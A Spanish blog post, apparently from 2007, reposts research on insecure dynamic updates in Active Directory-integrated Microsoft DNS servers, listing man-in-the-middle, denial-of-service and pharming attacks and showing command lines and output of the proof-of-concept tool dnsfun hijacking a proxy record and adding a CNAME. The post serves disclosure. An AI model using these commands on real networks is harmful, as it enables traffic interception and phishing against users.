Explotando actualizaciones dinámicas en Microsoft DNS Server

Hola:

Andrés Tarascó ha vuelto a publicar un interesantísimo trabajo en el que demuestra una nueva manera de explotar una debilidad en la configuración de los servidores DNS de Microsoft integrados en el directorio activo.

Os copio la información publicada por Andrés, aunque el documento original lo podeis encontrar en:
http://www.514.es/2007/03/explotando_actualizaciones_din.html

La configuración por defecto de la mayoría de lo servidores de DNS de Microsoft integrados en el directorio activo permiten las actualizaciones dinámicas no seguras. Este procedimiento permite que el servicio “Dns Client” envíe una actualización al servidor de dns cada vez que el dhcp asigna una ip.

Esta funcionalidad permite que cualquier usuario remoto sea capaz de modificar o borrar cualquier entrada en el servidor de dns.
Los siguientes, son una lista de posibles ataques que se pueden realizar en una red cuyo dns tiene este modo de funcionamiento:

+ Ataques MITM (Man in the middle): Modificando el registro dns que apunta al proxy web de la organización permite interceptar peticiones HTTP, reenviarlo y modificar las peticiones.
Este es uno de los vectores de ataque más importantes y puede permitir explotar automáticamente las actualizaciones automáticas de software de la mayoría de productos, enviando otras aplicaciones al usuario.

+ Denegación de servicio: Eliminando o modificando registros críticos en el servidor DNS (registros de servicios o de recursos internos)

+ Pharming: El compromiso del servidor de dns permite realizar ataques de mitm y envenenar registros dns que permitan ataques de phishing.

La herramienta dnsfun ayuda a verificar y explotar esta configuración insegura permitiendo a un usuario modificar los registros del dns. A continuación se muestran algunos ejemplos de lo que se puede realizar con dnsfun:

Obtener la dirección de un proxy falso

D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:

Modificar el registro dns del proxy apuntando a nuestra ip

D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
Microsoft Dynamic DNS Updates – Proof of Concept
http://www.514.es – (c) 2007 Andres Tarasco Acuña

[+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
[+] Host proxy.mydomain resolved as 192.168.1.200
[+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
[+] Trying Nonsecure Dynamic Update…
[?] Host Updated. Checking…(0)
[+] Host proxy.mydomain resolved as 66.6.66.6

Crear un Alias en el servidor DNS

D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com -u http://www.514.es
Microsoft Dynamic DNS Updates – Proof of Concept
http://www.514.es – (c) 2007 Andres Tarasco Acuña

[+] Gathering Credentials..
[+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
[+] Host Created. Rechecking Record…
[+] Host atarasco.mydomain.com resolved as CNAME http://www.514.es

Por ultimo destacar que no se trata de una vulnerabilidad nueva aunque los vectores de ataque comentados aqui no habían sido identificados o explotados activamente en el pasado.

Código fuente de dnsfun:Descargar source.
Versión compilada de dnsfun con MVS6: Descargar fichero

Mirror local: dnsfun.c

Origen: http://www.514.es

fuente: http://cyruxnet.org/news.htm

Publicado en Noticias

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: